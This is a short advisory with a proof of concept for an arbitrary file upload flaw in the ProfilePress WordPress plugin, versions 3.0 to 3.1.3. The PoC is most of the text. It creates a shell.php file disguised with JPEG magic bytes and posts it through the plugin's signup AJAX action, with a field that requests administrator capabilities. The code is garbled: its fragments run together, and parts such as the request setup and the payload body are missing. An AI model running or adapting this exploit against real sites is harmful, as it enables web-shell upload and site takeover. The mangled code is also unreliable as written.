ProfilePress 3.0 - 3.1.3 - Arbitrary File Upload in File Uploader Component

There is functionality in the plugin to add file uploads to user registrations and profile updates that had no file type checking in place making it possible for arbitrary files to be uploaded.

PoC

fh = open(‘shell.php’, ‘wb’) fh.write(b’\xFF\xD8\xFF\xE0’ + b’') fh.close ‘Hax0r’, ‘reg_email’ => ‘[email protected]’, ‘reg_password’ => ‘password’, ‘reg_password_present’ => ‘true’, ‘reg_first_name’ => ‘Hax0r’, ‘reg_last_name’ => ‘hack’, ‘wp_capabilities[administrator]’ => ‘1’, ‘action’ => ‘pp_ajax_signup’, ‘melange_id’ => ‘’, ‘files’ => $cFile, ]); $output = curl_exec($ch); curl_close($ch); print_r($output); ?>